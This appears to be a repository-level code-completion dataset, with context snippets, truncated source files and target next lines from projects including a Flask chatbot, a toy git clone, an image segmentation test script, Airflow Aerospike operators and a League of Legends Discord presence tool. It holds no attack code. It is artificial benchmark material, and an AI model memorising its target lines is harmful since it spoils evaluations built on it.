"snippet": "def get_i(id, i):\n LIST_DIR = os.path.join(os.path.dirname(__file__), '../data/list')\n i = int(i)\n try:\n with open(os.path.join(LIST_DIR, str(id)+'.json'),'r') as f:\n data = json.load(f)\n if 0 <= i < len(data):\n return data[i]['guidance']+'.png', i==len(data)-1\n else:\n return f\"Index {i} is out of range.\"\n except Exception as e:\n return str(e)"
},
{
"identifier": "imgs",
"path": "model/common.py",
"snippet": "TEST_DIR = []\nDATA_DIR = os.path.join(os.path.dirname(__file__), '../data')\nLIST_DIR = os.path.join(DATA_DIR, 'list')"
},
{
"identifier": "image_process",
"path": "model/process.py",
"snippet": "def image_process(image_user_path, image_list, app=None):\n \"\"\"\n img_user_path: absolute path of user image\n img_list: list of guidance img\n \"\"\"\n print(TEST_DIR)\n image_user = io.imread(image_user_path)\n max_score = 0\n max_similar = 0\n for i in range(len(image_list)):\n if app: app.logger.info(f\"Calculating Similarity: image {i}\")\n score = classify_hist_with_split(image_user, image_list[i])\n if score > max_score:\n max_score = score\n max_similar = i\n if max_score < 0.7:\n return None\n\n return max_similar, max_score"
}
] | import os
import spacy
import logging
import pandas as pd
from logging.handlers import RotatingFileHandler
from flask import Flask, render_template, request, jsonify, send_from_directory
from flask_cors import cross_origin
from utils.loader import read_keywords_from_file
from utils.hints import HELP, get_NUMBER_EMBD_HINT, get_CURRENT_STATE_HINT, get_NEXT_STEP_HINT
from utils.test import extract_and_validate_test_number
from utils.log import log_
from utils.file import get_i
from model.common import imgs
from model.process import image_process | 1,501 |
DEFAULT_RESPONSE_FLAG = "*"
NUMBER_EMBD_HINT = None
CURRENT_BUG_ID = -1
# Load spaCy English model
nlp = spacy.load("en_core_web_sm")
app = Flask(__name__, template_folder='')
# Configure
LOG_DIR = os.path.join(app.root_path, 'log')
DATA_DIR = os.path.join(app.root_path, 'data')
MODEL_DIR = os.path.join(app.root_path, 'model')
CORPUS_DIR = os.path.join(DATA_DIR, 'corpus')
GUIDANCE_DIR = os.path.join(DATA_DIR, 'guidance')
STATE_DIR = os.path.join(DATA_DIR, 'state')
std = pd.read_csv(os.path.join(CORPUS_DIR, 'std.csv'))
df = pd.merge(
pd.read_csv(os.path.join(CORPUS_DIR, 'qa.csv')),
std,
on='ID',
how='left'
)
qa = dict(zip(df['Q'], df['A']))
at = dict(zip(std['A'], std['TYPE']))
ta = dict(zip(std['TYPE'], std['A']))
|
DEFAULT_RESPONSE_FLAG = "*"
NUMBER_EMBD_HINT = None
CURRENT_BUG_ID = -1
# Load spaCy English model
nlp = spacy.load("en_core_web_sm")
app = Flask(__name__, template_folder='')
# Configure
LOG_DIR = os.path.join(app.root_path, 'log')
DATA_DIR = os.path.join(app.root_path, 'data')
MODEL_DIR = os.path.join(app.root_path, 'model')
CORPUS_DIR = os.path.join(DATA_DIR, 'corpus')
GUIDANCE_DIR = os.path.join(DATA_DIR, 'guidance')
STATE_DIR = os.path.join(DATA_DIR, 'state')
std = pd.read_csv(os.path.join(CORPUS_DIR, 'std.csv'))
df = pd.merge(
pd.read_csv(os.path.join(CORPUS_DIR, 'qa.csv')),
std,
on='ID',
how='left'
)
qa = dict(zip(df['Q'], df['A']))
at = dict(zip(std['A'], std['TYPE']))
ta = dict(zip(std['TYPE'], std['A'])) | key_words = read_keywords_from_file( | 0 | 2023-12-20 09:44:09+00:00 | 2k |
yash-srivastava19/verizon | classes.py | [
{
"identifier": "kvlm_serialize",
"path": "other_utils.py",
"snippet": "def kvlm_serialize(kvlm):\n ret = b''\n\n for k in kvlm.keys():\n if k == None: continue\n val = kvlm[k]\n\n if type(val) != list:\n val = [val]\n \n for v in val:\n ret += k + b' ' + (v.replace(b'\\n ')) + b'\\n'\n \n ret += b'\\n' + kvlm[None] + b'\\n'\n\n return ret"
},
{
"identifier": "kvlm_parse",
"path": "other_utils.py",
"snippet": "def kvlm_parse(raw, start=0, dct=None):\n if not dct:\n dct = collections.OrderedDict()\n\n # We search for next space and the next line. If space appears before a newline, we have a keyword. Othewise, it's the final message, which we just read to the end of file.\n spc = raw.find(b' ', start)\n nl = raw.find(b'\\n', start)\n\n # Base Case : \n if (spc<0) or (nl<spc):\n assert nl==start \n dct[None] = raw[start+1 :]\n return dct\n \n # Recursive Case : \n key = raw[start:spc]\n end = start\n\n # Find the end of the value. We loop until we find a '\\n' followed by a space.\n while True:\n end = raw.find(b'\\n', end+1)\n if raw[end+1] != ord(' '): break \n \n value = raw[spc+1: end].replace(b'\\n ', b'\\n')\n\n if key in dct:\n if type(dct[key]) == list:\n dct[key].append(value)\n else:\n dct[key] = [dct[key], value]\n else:\n dct[key] = value \n \n return kvlm_parse(raw, start=end+1, dct=dct)"
}
] | from class_utils import *
from other_utils import kvlm_serialize, kvlm_parse | 939 |
class VerizonRepository:
worktree = None
vrzdir = None
conf = None
def __init__(self, path, force = False):
self.worktree = path
self.vrzdir = os.path.join(path, ".vrz")
if not (force or os.path.isdir(self.vrzdir)):
raise Exception(f"Not a Verizon Repository : {path}")
# Read Config file.
self.conf = configparser.ConfigParser()
cf = repo_file(self, "config")
if cf and os.path.exists(cf):
self.conf.read([cf])
elif not force:
raise Exception("Configuration File is Missing")
if not force:
vers = int(self.conf.get("core", "repositoryformatversion"))
if vers != 0:
raise Exception(f"Unsupported repositoryformatversion : {vers}")
class VerizonObject:
def __init__(self, data=None) -> None:
if data != None:
self.deserialize(data)
else:
self.init()
def serialize(self, repo):
""" Read the objects contents, and do whatever it takes to convert it into a meaningful representation. """
raise NotImplementedError
def deserialize(self, data):
raise NotImplementedError
def init(self):
pass
# Tree wrapper for a single record(a single path).
class VerizonTreeLeaf:
def __init__(self, mode, path, sha) -> None:
self.mode = mode
self.path = path
self.sha = sha
## Type Header could be one of `blob`, `commit`, `tag`, `tree`.
# Blobs are user data. The content of every file we put in git is stored as a blob.
class VerizonBlob(VerizonObject):
fmt = b'blob'
def serialize(self):
return self.blobdata
def deserialize(self, data):
self.blobdata = data
class VerizonCommit(VerizonObject):
fmt = b'commit'
def deserialize(self, data):
self.kvlm = kvlm_parse(data)
def serialize(self, repo):
|
class VerizonRepository:
worktree = None
vrzdir = None
conf = None
def __init__(self, path, force = False):
self.worktree = path
self.vrzdir = os.path.join(path, ".vrz")
if not (force or os.path.isdir(self.vrzdir)):
raise Exception(f"Not a Verizon Repository : {path}")
# Read Config file.
self.conf = configparser.ConfigParser()
cf = repo_file(self, "config")
if cf and os.path.exists(cf):
self.conf.read([cf])
elif not force:
raise Exception("Configuration File is Missing")
if not force:
vers = int(self.conf.get("core", "repositoryformatversion"))
if vers != 0:
raise Exception(f"Unsupported repositoryformatversion : {vers}")
class VerizonObject:
def __init__(self, data=None) -> None:
if data != None:
self.deserialize(data)
else:
self.init()
def serialize(self, repo):
""" Read the objects contents, and do whatever it takes to convert it into a meaningful representation. """
raise NotImplementedError
def deserialize(self, data):
raise NotImplementedError
def init(self):
pass
# Tree wrapper for a single record(a single path).
class VerizonTreeLeaf:
def __init__(self, mode, path, sha) -> None:
self.mode = mode
self.path = path
self.sha = sha
## Type Header could be one of `blob`, `commit`, `tag`, `tree`.
# Blobs are user data. The content of every file we put in git is stored as a blob.
class VerizonBlob(VerizonObject):
fmt = b'blob'
def serialize(self):
return self.blobdata
def deserialize(self, data):
self.blobdata = data
class VerizonCommit(VerizonObject):
fmt = b'commit'
def deserialize(self, data):
self.kvlm = kvlm_parse(data)
def serialize(self, repo): | return kvlm_serialize(self.kvlm) | 0 | 2023-12-18 18:53:26+00:00 | 2k |
amazon-science/c2f-seg | test_c2f_seg.py | [
{
"identifier": "load_dataset",
"path": "data/dataloader_transformer.py",
"snippet": "def load_dataset(config, args, mode):\n if mode==\"train\":\n if args.dataset==\"KINS\":\n train_dataset = Kins_Fusion_dataset(config, mode='train')\n test_dataset = Kins_Fusion_dataset(config, mode='test')\n elif args.dataset==\"COCOA\":\n train_dataset = COCOA_Fusion_dataset(config, mode='train')\n test_dataset = COCOA_Fusion_dataset(config, mode='test')\n elif args.dataset==\"Fishbowl\":\n train_dataset = FishBowl(config, mode='train')\n test_dataset = FishBowl(config, mode='test')\n elif args.dataset==\"MOViD_A\":\n train_dataset = MOViD_A(config, mode='train')\n test_dataset = MOViD_A(config, mode='test')\n return train_dataset, test_dataset \n else:\n if args.dataset==\"KINS\":\n test_dataset = KINS_Aisformer_VRSP_Intersection(config, mode='test')\n elif args.dataset==\"COCOA\":\n test_dataset = COCOA_Fusion_dataset(config, mode='test')\n elif args.dataset==\"Fishbowl\":\n test_dataset = FishBowl(config, mode='test')\n elif args.dataset==\"MOViD_A\":\n test_dataset = MOViD_A(config, mode='test')\n return test_dataset"
},
{
"identifier": "setup_logger",
"path": "utils/logger.py",
"snippet": "def setup_logger(work_dir=None, logfile_name='log.txt', logger_name='log'):\n \"\"\"Sets up logger from target work directory.\n\n The function will sets up a logger with `DEBUG` log level. Two handlers will\n be added to the logger automatically. One is the `sys.stdout` stream, with\n `INFO` log level, which will print improtant messages on the screen. The other\n is used to save all messages to file `$WORK_DIR/$LOGFILE_NAME`. Messages will\n be added time stamp and log level before logged.\n\n NOTE: If `work_dir` or `logfile_name` is empty, the file stream will be\n skipped.\n\n Args:\n work_dir: The work directory. All intermediate files will be saved here.\n (default: None)\n logfile_name: Name of the file to save log message. (default: `log.txt`)\n logger_name: Unique name for the logger. (default: `logger`)\n\n Returns:\n A `logging.Logger` object.\n\n Raises:\n SystemExit: If the work directory has already existed, of the logger with\n specified name `logger_name` has already existed.\n \"\"\"\n logger = logging.getLogger(logger_name)\n formatter = logging.Formatter(\"[%(asctime)s][%(levelname)s] %(message)s\")\n if not logger.handlers:\n logger.setLevel(logging.DEBUG)\n # Print log message with `INFO` level or above onto the screen.\n sh = logging.StreamHandler(stream=sys.stdout)\n # sh.setLevel(logging.INFO)\n sh.setLevel(logging.INFO)\n sh.setFormatter(formatter)\n logger.addHandler(sh)\n logger.propagate = False\n\n if not work_dir or not logfile_name:\n return logger\n\n if os.path.exists(work_dir):\n print(f'Work directory `{work_dir}` has already existed!')\n os.makedirs(work_dir, exist_ok=True)\n\n # Save log message with all levels in log file.\n fh = logging.FileHandler(os.path.join(work_dir, logfile_name))\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n return logger"
},
{
"identifier": "Config",
"path": "utils/utils.py",
"snippet": "class Config(object):\n def __init__(self, config_path):\n with open(config_path, 'r') as f:\n self._yaml = f.read()\n self._dict = yaml.load(self._yaml, Loader=yaml.SafeLoader)\n self._dict['path'] = os.path.dirname(config_path)\n\n def __getattr__(self, name):\n if self._dict.get(name) is not None:\n return self._dict[name]\n\n return None\n\n def print(self):\n print('Model configurations:')\n print('---------------------------------')\n print(self._yaml)\n print('')\n print('---------------------------------')\n print('')"
},
{
"identifier": "to_cuda",
"path": "utils/utils.py",
"snippet": "def to_cuda(meta, device):\n for k in meta:\n if meta[k] is not None:\n meta[k] = meta[k].to(device)\n return meta"
}
] | import os
import cv2
import time
import random
import argparse
import numpy as np
import torch
import torch.distributed as dist
from tqdm import tqdm
from shutil import copyfile
from torch.utils.data import DataLoader
from data.dataloader_transformer import load_dataset
from utils.logger import setup_logger
from utils.utils import Config, to_cuda
from src.image_model import C2F_Seg
from src.video_model import C2F_Seg | 1,546 |
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=42)
# path
parser.add_argument('--path', type=str, required=True, help='model checkpoints path')
parser.add_argument('--check_point_path', type=str, default="../check_points", )
parser.add_argument('--vq_path', type=str, required=True, default='KINS_vqgan')
# dataset
parser.add_argument('--dataset', type=str, default="MOViD_A", help = "select dataset")
parser.add_argument('--data_type', type=str, default="image", help = "select image or video model")
parser.add_argument('--batch', type=int, default=1)
parser.add_argument("--local_rank", default=-1, type=int, help="node rank for distributed training")
args = parser.parse_args()
if args.data_type=="image":
elif args.data_type=="video":
dist.init_process_group(backend="nccl")
torch.cuda.set_device(args.local_rank)
rank = dist.get_rank()
args.path = os.path.join(args.check_point_path, args.path)
vq_model_path = os.path.join(args.check_point_path, args.vq_path)
os.makedirs(args.path, exist_ok=True)
config_path = os.path.join(args.path, 'c2f_seg_{}.yml'.format(args.dataset))
    # copy config template if it doesn't exist
if not os.path.exists(config_path):
copyfile('./configs/c2f_seg_{}.yml'.format(args.dataset), config_path)
# load config file
config = Config(config_path)
config.path = args.path
config.batch_size = args.batch
config.dataset = args.dataset
log_file = 'log-{}.txt'.format(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
|
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=42)
# path
parser.add_argument('--path', type=str, required=True, help='model checkpoints path')
parser.add_argument('--check_point_path', type=str, default="../check_points", )
parser.add_argument('--vq_path', type=str, required=True, default='KINS_vqgan')
# dataset
parser.add_argument('--dataset', type=str, default="MOViD_A", help = "select dataset")
parser.add_argument('--data_type', type=str, default="image", help = "select image or video model")
parser.add_argument('--batch', type=int, default=1)
parser.add_argument("--local_rank", default=-1, type=int, help="node rank for distributed training")
args = parser.parse_args()
if args.data_type=="image":
elif args.data_type=="video":
dist.init_process_group(backend="nccl")
torch.cuda.set_device(args.local_rank)
rank = dist.get_rank()
args.path = os.path.join(args.check_point_path, args.path)
vq_model_path = os.path.join(args.check_point_path, args.vq_path)
os.makedirs(args.path, exist_ok=True)
config_path = os.path.join(args.path, 'c2f_seg_{}.yml'.format(args.dataset))
    # copy config template if it doesn't exist
if not os.path.exists(config_path):
copyfile('./configs/c2f_seg_{}.yml'.format(args.dataset), config_path)
# load config file
config = Config(config_path)
config.path = args.path
config.batch_size = args.batch
config.dataset = args.dataset
log_file = 'log-{}.txt'.format(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())) | logger = setup_logger(os.path.join(args.path, 'logs'), logfile_name=log_file) | 1 | 2023-12-21 04:25:47+00:00 | 2k |
Hammour-steak/GOUB | codes/models/modules/DenoisingNAFNet_arch.py | [
{
"identifier": "SinusoidalPosEmb",
"path": "codes/models/modules/module_util.py",
"snippet": "class SinusoidalPosEmb(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n\n def forward(self, x):\n device = x.device\n half_dim = self.dim // 2\n emb = math.log(10000) / (half_dim - 1)\n emb = torch.exp(torch.arange(half_dim, device=device) * -emb)\n emb = x[:, None] * emb[None, :]\n emb = torch.cat((emb.sin(), emb.cos()), dim=-1)\n return emb"
},
{
"identifier": "LayerNorm",
"path": "codes/models/modules/module_util.py",
"snippet": "class LayerNorm(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.g = nn.Parameter(torch.ones(1, dim, 1, 1))\n\n def forward(self, x):\n eps = 1e-5 if x.dtype == torch.float32 else 1e-3\n var = torch.var(x, dim = 1, unbiased = False, keepdim = True)\n mean = torch.mean(x, dim = 1, keepdim = True)\n return (x - mean) * (var + eps).rsqrt() * self.g"
},
{
"identifier": "exists",
"path": "codes/models/modules/module_util.py",
"snippet": "def exists(x):\n return x is not None"
}
] | import torch
import torch.nn as nn
import torch.nn.functional as F
from einops import rearrange, reduce
from .module_util import SinusoidalPosEmb, LayerNorm, exists | 802 |
class SimpleGate(nn.Module):
def forward(self, x):
x1, x2 = x.chunk(2, dim=1)
return x1 * x2
class NAFBlock(nn.Module):
def __init__(self, c, time_emb_dim=None, DW_Expand=2, FFN_Expand=2, drop_out_rate=0.):
super().__init__()
self.mlp = nn.Sequential(
SimpleGate(), nn.Linear(time_emb_dim // 2, c * 4)
) if time_emb_dim else None
dw_channel = c * DW_Expand
self.conv1 = nn.Conv2d(in_channels=c, out_channels=dw_channel, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
self.conv2 = nn.Conv2d(in_channels=dw_channel, out_channels=dw_channel, kernel_size=3, padding=1, stride=1, groups=dw_channel,
bias=True)
self.conv3 = nn.Conv2d(in_channels=dw_channel // 2, out_channels=c, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
# Simplified Channel Attention
self.sca = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(in_channels=dw_channel // 2, out_channels=dw_channel // 2, kernel_size=1, padding=0, stride=1,
groups=1, bias=True),
)
# SimpleGate
self.sg = SimpleGate()
ffn_channel = FFN_Expand * c
self.conv4 = nn.Conv2d(in_channels=c, out_channels=ffn_channel, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
self.conv5 = nn.Conv2d(in_channels=ffn_channel // 2, out_channels=c, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
|
class SimpleGate(nn.Module):
def forward(self, x):
x1, x2 = x.chunk(2, dim=1)
return x1 * x2
class NAFBlock(nn.Module):
def __init__(self, c, time_emb_dim=None, DW_Expand=2, FFN_Expand=2, drop_out_rate=0.):
super().__init__()
self.mlp = nn.Sequential(
SimpleGate(), nn.Linear(time_emb_dim // 2, c * 4)
) if time_emb_dim else None
dw_channel = c * DW_Expand
self.conv1 = nn.Conv2d(in_channels=c, out_channels=dw_channel, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
self.conv2 = nn.Conv2d(in_channels=dw_channel, out_channels=dw_channel, kernel_size=3, padding=1, stride=1, groups=dw_channel,
bias=True)
self.conv3 = nn.Conv2d(in_channels=dw_channel // 2, out_channels=c, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
# Simplified Channel Attention
self.sca = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(in_channels=dw_channel // 2, out_channels=dw_channel // 2, kernel_size=1, padding=0, stride=1,
groups=1, bias=True),
)
# SimpleGate
self.sg = SimpleGate()
ffn_channel = FFN_Expand * c
self.conv4 = nn.Conv2d(in_channels=c, out_channels=ffn_channel, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
self.conv5 = nn.Conv2d(in_channels=ffn_channel // 2, out_channels=c, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
| self.norm1 = LayerNorm(c) | 1 | 2023-12-15 09:40:18+00:00 | 2k |
eldar-eln-bigabid/airflow-aerospike-provider | tests/operators/test_aerospike.py | [
{
"identifier": "AerospikeGetKeyOperator",
"path": "aerospike_provider/operators/aerospike.py",
"snippet": "class AerospikeGetKeyOperator(BaseOperator):\n \"\"\"\n Read an existing record(s) metadata and all of its bins for a specified key.\n\n :param namespace: namespace to use in aerospike db\n :param set: set name in the namespace\n :param key: key to get and return. can be a single key or a list of keys\n :param policy: which policy the key should be saved with. default `POLICY_KEY_SEND`\n :param aerospike_conn_id: aerospike connection to use, defaults to 'aerospike_default'\n \"\"\"\n\n template_fields: Sequence[str] = (\"key\",)\n template_ext: Sequence[str] = ()\n ui_color = \"#66c3ff\"\n\n def __init__(\n self,\n namespace: str,\n set: str,\n key: Union[List[str], str],\n policy: dict = {'key': aerospike.POLICY_KEY_SEND},\n aerospike_conn_id: str = \"aerospike_default\",\n **kwargs: Any,\n ) -> None:\n super().__init__(**kwargs)\n self.key = key\n self.namespace = namespace\n self.set = set\n self.key = key\n self.policy = policy\n self.aerospike_conn_id = aerospike_conn_id\n\n def execute(self, context: Context) -> list:\n with AerospikeHook(self.aerospike_conn_id) as hook:\n self.log.info('Fetching key')\n records = hook.get_record(key=self.key, namespace=self.namespace, set=self.set, policy=self.policy)\n parsed_records = self.parse_records(records=records)\n self.log.info('Got %s records', len(parsed_records))\n return parsed_records\n\n def parse_records(self, records: Union[List, tuple]) -> list:\n # Removing the `bytearray` object from records since object of type bytearray is not JSON serializable for Xcom.\n if isinstance(records, list):\n data = list(map(self.create_dict_from_record, records))\n elif isinstance(records, tuple):\n data = [self.create_dict_from_record(record=records)]\n else:\n raise ValueError(f\"Expecting 'list' or 'tuple', got: {type(records)}\")\n return data\n\n @staticmethod\n def create_dict_from_record(record: tuple) -> dict:\n try:\n return {\n \"namespace\": record[0][0],\n \"set\": record[0][1],\n \"key\": record[0][2],\n \"metadata\": record[1],\n \"bins\": record[2]\n }\n except IndexError:\n # Handling an error when there are no 'bins' the data\n return {\n \"namespace\": record[0][0],\n \"set\": record[0][1],\n \"key\": record[0][2],\n \"metadata\": record[1]\n }"
},
{
"identifier": "AerospikePutKeyOperator",
"path": "aerospike_provider/operators/aerospike.py",
"snippet": "class AerospikePutKeyOperator(BaseOperator):\n \"\"\"\n Create a new record, add or remove bins.\n\n This can also remove a record (if exists) using ` `{\"bin\": aerospuke.null() }`` if it's the last bin.\n\n :param key: key to save in the db.\n :param namespace: namespace to use in aerospike db\n :param set: set name in the namespace\n :param bins: bins name and data saved along with a key as key values. For example: `{\"bin\": value}`\n :param metadata: metadata about the key eg. ttl. For example: `{\"ttl\": 0}`\n :param policy: which policy the key should be saved with. default `POLICY_EXISTS_IGNORE`. ref: https://developer.aerospike.com/client/usage/atomic/update#policies\n :param aerospike_conn_id: aerospike connection to use, defaults to 'aerospike_default'\n \"\"\"\n\n template_fields: Sequence[str] = (\"key\", \"bins\", \"metadata\", )\n template_ext: Sequence[str] = ()\n ui_color = \"#66c3ff\"\n\n def __init__(\n self,\n namespace: str,\n set: str,\n key: str,\n bins: dict,\n metadata: Union[dict, Any] = None,\n policy: Dict[str, Any] = {'key': aerospike.POLICY_EXISTS_IGNORE},\n aerospike_conn_id: str = \"aerospike_default\",\n **kwargs: Any,\n ) -> None:\n super().__init__(**kwargs)\n self.key = key\n self.namespace = namespace\n self.set = set\n self.key = key\n self.bins = bins\n self.metadata = metadata\n self.policy = policy\n self.aerospike_conn_id = aerospike_conn_id\n\n def execute(self, context: Context) -> None:\n with AerospikeHook(self.aerospike_conn_id) as hook:\n self.log.info('Storing %s as key', self.key)\n hook.put(key=self.key, bins=self.bins, metadata=self.metadata, namespace=self.namespace, set=self.set, policy=self.policy)\n self.log.info('Stored key successfully')"
}
] | import unittest
import aerospike
from unittest.mock import patch, Mock
from aerospike_provider.operators.aerospike import AerospikeGetKeyOperator, AerospikePutKeyOperator | 1,541 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
class TestAerospikeGetKeyOperator(unittest.TestCase):
def setUp(self):
self.namespace = 'test_namespace'
self.set = 'test_set'
self.key = 'test_key'
self.policy = { aerospike.POLICY_KEY_SEND }
self.task_id = 'test_task'
self.metadata = {'ttl': 1000, 'gen': 4}
self.bins = {'name': 'Aerospike Test', 'version': "1.0.0"}
| #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
class TestAerospikeGetKeyOperator(unittest.TestCase):
def setUp(self):
self.namespace = 'test_namespace'
self.set = 'test_set'
self.key = 'test_key'
self.policy = { aerospike.POLICY_KEY_SEND }
self.task_id = 'test_task'
self.metadata = {'ttl': 1000, 'gen': 4}
self.bins = {'name': 'Aerospike Test', 'version': "1.0.0"}
| self.operator = AerospikeGetKeyOperator( | 0 | 2023-12-17 18:35:36+00:00 | 2k |
Its-Haze/league-rpc-linux | league_rpc_linux/kda.py | [
{
"identifier": "wait_until_exists",
"path": "league_rpc_linux/polling.py",
"snippet": "def wait_until_exists(\n url: str,\n custom_message: str = \"\",\n expected_response_code: int = 200,\n timeout: int = 30,\n n_sleep: float | int = 5, # Not needed, but good to have.\n n_total_amount: int = 20,\n startup: int = False, # Set to True on the first time it tries to poll the local api. (onGameStart)\n) -> requests.Response | None:\n \"\"\"\n Polling on the local riot api until success is returned.\n \"\"\"\n\n for _ in range(n_total_amount):\n try:\n response = requests.get(url, timeout=timeout, verify=False)\n if response.status_code != expected_response_code:\n time.sleep(n_sleep)\n continue\n break\n except (\n NewConnectionError,\n ConnectionError,\n requests.exceptions.ConnectionError,\n ):\n # These errors occur either before the api has started..\n # Or when the game has ended\n if startup:\n # Make sure we continue to poll the api during the start of a game.\n time.sleep(n_sleep)\n continue\n\n # When game ends, we don't care about polling the api.\n return None\n else:\n print(custom_message)\n return None\n return response"
},
{
"identifier": "get_summoner_name",
"path": "league_rpc_linux/username.py",
"snippet": "def get_summoner_name(with_discriminator: bool = False) -> str:\n \"\"\"\n Gets the current summoner name.\n\n if with_discriminator is True, the function will return a summoners name with #EUW / #EUNE etc\n Defaults to not include it.\n\n \"\"\"\n url = \"https://127.0.0.1:2999/liveclientdata/activeplayername\"\n if response := wait_until_exists(\n url=url,\n custom_message=\"\"\"\n Summoner name could not be found.\n Contact @haze.dev on discord, or submit a ticket on Github.\n \"\"\",\n ):\n name = str(response.json())\n return name if with_discriminator else name.split(\"#\", maxsplit=1)[0]\n\n return \"\""
}
] | import urllib3
from requests import Response
from league_rpc_linux.polling import wait_until_exists
from league_rpc_linux.username import get_summoner_name | 892 |
urllib3.disable_warnings()
def get_kda() -> str:
"""
Get the current KDA of your game.
"""
response = get_current_user_stats()
if isinstance(response, Response):
parsed_data = response.json()
kills = str(parsed_data["kills"])
deaths = str(parsed_data["deaths"])
assists = str(parsed_data["assists"])
return f"{kills}/{deaths}/{assists}"
return ""
def get_level() -> int:
"""
Get the current Level of your game.
"""
response = get_current_active_player_stats()
if isinstance(response, Response):
parsed_data = response.json()
level = int(parsed_data["level"])
return level
return 0
def get_gold() -> int:
"""
Get the current gold of your game.
"""
response = get_current_active_player_stats()
if isinstance(response, Response):
parsed_data = response.json()
gold = int(parsed_data["currentGold"])
return gold
return 0
def get_creepscore() -> str:
"""
Get the current creepScore of your live game
creepScore is updated every 10cs by Riot.
"""
response = get_current_user_stats()
if isinstance(response, Response):
parsed_data = response.json()
creep_score = str(parsed_data["creepScore"])
return f"{creep_score}cs"
return ""
def get_current_user_stats() -> Response | None:
"""
Request data from playerscores?summonerName and return the response.
"""
|
urllib3.disable_warnings()
def get_kda() -> str:
"""
Get the current KDA of your game.
"""
response = get_current_user_stats()
if isinstance(response, Response):
parsed_data = response.json()
kills = str(parsed_data["kills"])
deaths = str(parsed_data["deaths"])
assists = str(parsed_data["assists"])
return f"{kills}/{deaths}/{assists}"
return ""
def get_level() -> int:
"""
Get the current Level of your game.
"""
response = get_current_active_player_stats()
if isinstance(response, Response):
parsed_data = response.json()
level = int(parsed_data["level"])
return level
return 0
def get_gold() -> int:
"""
Get the current gold of your game.
"""
response = get_current_active_player_stats()
if isinstance(response, Response):
parsed_data = response.json()
gold = int(parsed_data["currentGold"])
return gold
return 0
def get_creepscore() -> str:
"""
Get the current creepScore of your live game
creepScore is updated every 10cs by Riot.
"""
response = get_current_user_stats()
if isinstance(response, Response):
parsed_data = response.json()
creep_score = str(parsed_data["creepScore"])
return f"{creep_score}cs"
return ""
def get_current_user_stats() -> Response | None:
"""
Request data from playerscores?summonerName and return the response.
""" | your_summoner_name = get_summoner_name() | 1 | 2023-12-15 22:21:53+00:00 | 2k |
huahuahuage/Bert-VITS2-Speech | onnx_infer/onnx_infer.py | [
{
"identifier": "log_instance",
"path": "log.py",
"snippet": "DISABLED_LOGGER = [\"gradio.processing_utils\", \"gradio\", \"httpx\"]\r"
},
{
"identifier": "read_config",
"path": "config.py",
"snippet": "def read_config(config_path:str) -> dict:\r\n \"\"\"\r\n 取读配置文件\r\n \"\"\"\r\n f = open(config_path, \"rb\")\r\n try:\r\n raw_data:str = f.read()\r\n # 检测配置文件编码\r\n char_type = chardet.detect(raw_data)['encoding']\r\n # 解码\r\n data = raw_data.decode(char_type)\r\n config_data = json.loads(data)\r\n except:\r\n config_data = {}\r\n logging.error(f\"配置文件 {config_path} 不存在或者格式错误。\")\r\n\r\n f.close()\r\n\r\n return config_data\r"
},
{
"identifier": "config_instance",
"path": "config.py",
"snippet": "CONFIG_PATH = \"config.json\"\r\ndef read_config(config_path:str) -> dict:\r\n def __init__(self) -> None:\r\n def get(self, key, default=None):\r\nclass ONNX_CONFIG:\r"
},
{
"identifier": "clean_text",
"path": "onnx_infer/text/cleaner.py",
"snippet": "def clean_text(text: str, language: str):\r\n \"\"\"\r\n 处理标点符号,并将文本转化成对应语言音标?\r\n\r\n norm_text:处理标点后的文本\r\n\r\n phones:所有文本的音标列表\r\n\r\n tones:所有文本的音调\r\n\r\n word2ph:单个字的音标个数\r\n\r\n \"\"\"\r\n try:\r\n language_text_normalize = getattr(text_normalize_instance, language)\r\n except AttributeError:\r\n raise TypeError(f\"语言类型输入错误:{language}。\")\r\n # 替换所有阿拉伯数字为对应语言,同时将符号替换为指定列表内的英文符号\r\n norm_text = language_text_normalize(text)\r\n phones, tones, word2ph = getattr(g2p_instance, language)(norm_text)\r\n return norm_text, phones, tones, word2ph\r"
},
{
"identifier": "cleaned_text_to_sequence",
"path": "onnx_infer/text/cleaner.py",
